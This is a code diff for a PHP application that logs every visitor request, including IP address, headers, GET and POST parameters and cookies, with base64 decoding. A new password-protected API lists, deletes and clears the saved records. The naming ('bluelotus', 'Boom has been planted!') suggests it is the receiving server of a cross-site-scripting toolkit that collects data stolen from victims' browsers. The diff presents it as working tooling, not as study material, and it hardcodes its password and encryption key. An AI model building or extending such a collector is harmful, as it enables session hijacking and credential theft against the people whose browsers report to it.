Version 1.1

.htaccess

@@ -0,0 +1 @@
+Options -Indexes

api.php

@@ -0,0 +1,90 @@
+<?php
+require('auth.php');
+require_once("util.php");
+require_once("config.php");
+require_once("dio.php");
+header('Content-Type: application/json');
+if(isset($_GET['cmd']))
+{
+	switch($_GET['cmd'])
+	{
+		case 'list':
+			echo json_encode(dirList());
+				
+			break;
+			
+		case 'get':
+			if(isset($_GET['id'])&&preg_match('/^[0-9]{10}$/',$_GET['id']))
+				echo json_encode(loadInfo($_GET['id']));	
+			else
+				echo json_encode(false);
+			break;
+			
+		case 'del':
+			if(isset($_GET['id'])&&preg_match('/^[0-9]{10}$/',$_GET['id']))
+				echo json_encode(delInfo($_GET['id']));	
+			else
+				echo json_encode(false);
+			break;
+		
+		case 'clear':
+			clearInfo();
+			break;
+	}
+}
+
+function dirList() { 
+
+	$list=array();
+	$files = glob(DATA_PATH . '/*.php'); 
+	
+	foreach ($files as $file) { 
+		//$listinfo=array();
+		$info=loadInfo(basename($file,".php"));
+		
+		//$listinfo["request_time"]=$info["request_time"];
+		//$listinfo['user_IP']=$info['user_IP'];
+		//$listinfo['location']=$info['location'];
+		
+		//$listinfo['request_method']=$info['request_method'];
+		
+		
+		$data_type=array();
+		if(count($info['get_data'])>0)
+		{
+			$get_keys=array();
+			foreach($info['get_data'] as $k => $v) {
+				$get_keys[]=$k;
+			}
+			$data_type['GET']=$get_keys;
+		}
+		
+		
+		if(count($info['post_data'])>0)
+		{
+			$post_keys=array();
+			foreach($info['post_data'] as $k => $v) {
+				$post_keys[]=$k;
+			}
+			$data_type['POST']=$post_keys;
+		}
+		
+		
+		if(count($info['cookie_data'])>0)
+		{
+			$cookie_keys=array();
+			foreach($info['cookie_data'] as $k => $v) {
+				$cookie_keys[]=$k;
+			}
+			$data_type['COOKIE']=$cookie_keys;
+		}
+		
+		$info['data_type']=json_encode($data_type);
+		
+		$list[]= $info;
+		
+	} 
+		
+	return $list; 
+} 
+?>

config.php

@@ -1,7 +1,7 @@
 <?php
-
+define('PASS', 'bluelotus');
 define('DATA_PATH', 'data');
 define('ENABLE_ENCRYPT', true);
 define('ENCRYPT_PASS', "bluelotus");
-
+define('KEEP_SESSION', true);
 ?>

data/index.html

@@ -0,0 +1 @@
+Boom has been planted!

dio.php

@@ -33,8 +33,24 @@ function loadInfo($filename)
 
 	if(!preg_match('/^[A-Za-z0-9\x00-\x80~!@#$%&_+-=:";\'<>,\/"\[\]\\\^\.\|\?\*\+\(\)\{\}\s]+$/',$info))
 		return false;
-	$info=json_decode($info); 
+	$info=json_decode($info, true); 
 	
 	return $info;
 }
+
+function delInfo($filename)
+{
+	$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
+	return unlink($logFile);
+}
+
+function clearInfo()
+{
+	$files = glob(DATA_PATH . '/*.php'); 
+	
+	foreach ($files as $file) { 
+		unlink($file);
+	} 
+	
+}
 ?>

index.php

@@ -26,22 +26,26 @@ $decoded_post_data=tryBase64Decode($_POST);
 $cookie_data=$_COOKIE;
 $decoded_cookie_data=tryBase64Decode($_COOKIE);
 
-$info['user_IP'] = $user_IP;
-$info['user_port'] = $user_port;
-$info['protocol'] = $protocol;
-$info['request_method'] = $request_method;
-$info['request_URI'] = $request_URI;
-$info['request_time'] = $request_time;
-$info['headers_data'] = $headers_data;
-$info['get_data'] = $get_data;
+$info['user_IP'] = stripStr($user_IP);
+$info['user_port'] = stripStr($user_port);
+$info['protocol'] = stripStr($protocol);
+$info['request_method'] = stripStr($request_method);
+$info['request_URI'] = stripStr($request_URI);
+$info['request_time'] = stripStr($request_time);
+
+$info['headers_data'] = stripArr($headers_data);
+
+$info['get_data'] = stripArr($get_data);
 if($decoded_get_data)
-	$info['decoded_get_data'] = $decoded_get_data;
-$info['post_data'] = $post_data;
+	$info['decoded_get_data'] = stripArr($decoded_get_data);
+
+$info['post_data'] = stripArr($post_data);
 if($decoded_post_data)
-	$info['decoded_post_data'] = $decoded_post_data;
-$info['cookie_data'] = $cookie_data;
+	$info['decoded_post_data'] = stripArr($decoded_post_data);
+
+$info['cookie_data'] = stripArr($cookie_data);
 if($decoded_cookie_data)
-	$info['decoded_cookie_data'] = $decoded_cookie_data;
+	$info['decoded_cookie_data'] = stripArr($decoded_cookie_data);
 
 saveInfo(json_encode($info),$request_time);
 

util.php

@@ -1,5 +1,6 @@
 <?php
 require_once("aes.php");
+
 function getIP()
 {
 	if(isset($_SERVER['HTTP_CLIENT_IP'])) {
@@ -34,6 +35,20 @@ if (!function_exists('getallheaders')) {
     }
 }
 
+function stripStr($str){
+	if(get_magic_quotes_gpc())
+		$str=stripslashes($str);
+	return addslashes(htmlspecialchars($str,ENT_QUOTES));
+}
+
+function stripArr($arr){
+	$new_arr=array();
+	foreach($arr as $k => $v) {
+		$new_arr[stripStr($k)] = stripStr($v);
+	}
+	return $new_arr;
+}
+
 function tryBase64Decode($arr) 
 {
 	if(isset($arr)&&count($arr)>0)
@@ -41,10 +56,8 @@ function tryBase64Decode($arr)
 		$isChanged=0;
 		
 		$new_arr = array();
-		foreach($arr as $k => $v) 
-		{
-			if(isBase64Formatted($v))
-			{
+		foreach($arr as $k => $v) {
+			if(isBase64Formatted($v)) {
 				$v=base64_decode($v);
 				$isChanged=1;
 			}
@@ -63,16 +76,9 @@ function tryBase64Decode($arr)
 function isBase64Formatted($str)
 {
 	if(preg_match('/^[A-Za-z0-9+\/=]+$/',$str))
-	{
-		$decoded_str=base64_decode($str);
-		if ($str == base64_encode($decoded_str)) 
-		{
-			if(preg_match('/^[A-Za-z0-9\x00-\x80~!@#$%&_+-=:";\'<>,\/"\[\]\\\^\.\|\?\*\+\(\)\{\}\s]+$/',$decoded_str))
-			{
+		if ($str == base64_encode(base64_decode($str))) 
+			if(preg_match('/^[A-Za-z0-9\x00-\x80~!@#$%&_+-=:";\'<>,\/"\[\]\\\^\.\|\?\*\+\(\)\{\}\s]+$/',base64_decode($str)))
 				return true;
-			}
-		}
-	}
     return false;
 }
 
@@ -86,4 +92,5 @@ function decrypt($info,$encryptPass)
 	return AESDecryptCtr($info,$encryptPass);
 }
 
+
 ?>